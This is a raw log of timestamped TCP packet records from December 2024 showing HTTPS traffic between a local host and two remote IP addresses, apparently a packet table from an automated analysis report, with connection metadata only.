                                                                                                                      Dec 3, 2024 08:55:50.767704010 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.767740011 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.768039942 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.768054008 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.768377066 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.768400908 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.768457890 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.769117117 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.769129038 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.807982922 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.809604883 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.809638023 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.810085058 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.810091019 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.822348118 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.825620890 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.825690031 CET50067443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.825737000 CET50067443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.825746059 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.825762033 CET50067443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.825767040 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.828710079 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.828725100 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.828804016 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.828999043 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.829010963 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906534910 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906569958 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906579971 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906615973 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906688929 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.906708002 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.906719923 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.915532112 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.916281939 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.916316986 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.916682959 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.917177916 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.917237043 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.917464972 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.941447020 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.941554070 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.941608906 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.941639900 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.942208052 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.942225933 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.942653894 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.942701101 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.942758083 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.943245888 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.943260908 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.963324070 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.102089882 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.102780104 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.102807999 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.103336096 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.103341103 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.149301052 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.149595022 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.149617910 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.149899006 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.150198936 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.150253057 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.150347948 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.195331097 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.226558924 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.226588964 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.226690054 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.226707935 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.226756096 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.227857113 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.227895021 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.227950096 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.229376078 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.229408979 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.229504108 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.230027914 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.230041027 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.260802031 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.264600039 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.264645100 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.264724016 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.264761925 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.280761957 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.280781031 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.280791998 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.280797005 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.285222054 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.285259962 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.285321951 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.285489082 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.285501957 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.418292046 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.418308020 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.418452024 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.418457985 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.418596029 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.418644905 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.423230886 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.423237085 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.423269987 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.423297882 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.452341080 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.452734947 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.452763081 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.453859091 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.453933001 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.454366922 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.454448938 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.454535007 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.454545975 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.472134113 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.472162962 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.472279072 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.472297907 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486135960 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486166954 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486176968 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486217976 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486260891 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.486282110 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.486326933 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.488760948 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.488810062 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.488883972 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.489029884 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.489087105 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.489099979 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.489115000 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.489142895 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.489172935 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.491291046 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.491291046 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.491303921 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.491311073 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.491403103 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.492798090 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.492809057 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.496661901 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.497174978 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.497203112 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.497210026 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.497231960 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.497271061 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.497277975 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.497307062 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.510425091 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.510509968 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.510519028 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.510557890 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.510767937 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.510775089 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.511218071 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.511266947 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.511332989 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.512510061 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.512527943 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.546572924 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.549694061 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.549892902 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.549951077 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.549969912 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.549983978 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.549988985 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.553395033 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.553420067 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.553509951 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.553714037 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.553729057 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.684639931 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.693794012 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.693828106 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.694338083 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.694816113 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.694997072 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.694996119 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.735335112 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.737339020 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.749623060 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.749651909 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.749847889 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.749885082 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.758018017 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.758095026 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.758104086 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.758333921 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.758377075 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.758439064 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.758738995 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.758774042 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.758878946 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.759305000 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.759322882 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.862787962 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.899997950 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.900051117 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.900587082 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:51.900595903 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.943083048 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.943440914 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.943461895 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.943867922 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.944153070 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.944245100 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:51.944329977 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:51.991347075 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.002178907 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.002206087 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.002326965 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.002347946 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.010474920 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.010555029 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.010564089 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.010617971 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.286472082 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.286503077 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.286540985 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.286720991 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.286745071 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.286793947 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.293186903 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.293245077 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.293296099 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.297353029 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.297646999 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.297693968 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.297708988 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.297750950 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.439632893 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.439687014 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.439708948 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.439718008 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.444411039 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.444443941 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.446476936 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.446506977 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.452322006 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.456424952 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.456443071 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.456901073 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.456906080 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.457294941 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.457329035 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.457390070 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.457565069 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.457581043 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.520651102 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.520679951 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.520689011 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.520747900 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.520772934 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.524570942 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.524791956 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.524806976 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.525166988 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.525609016 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.525681019 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.525749922 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.571335077 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.573772907 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.676273108 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.676875114 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.676893950 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.677902937 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.677908897 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.744360924 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.744971037 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.744990110 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.746042967 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.746124029 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.746504068 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.746563911 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.746665001 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.746670961 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.756315947 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.756330967 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.756360054 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.756392956 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.756423950 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.760284901 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.760356903 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.760368109 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.760385036 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.760452032 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.760565042 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.760581017 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.761132002 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.761154890 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.761219978 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.761661053 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.761670113 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.790370941 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.792401075 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.792427063 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.792495966 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.792506933 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.808996916 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.809057951 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.809077978 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.809113979 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.809309006 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.809323072 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.809670925 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.809712887 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.809768915 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.810266972 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.810278893 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.897145033 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.900279999 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.900355101 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.900403023 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.900418997 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.900433064 CET50081443192.168.2.413.107.246.63
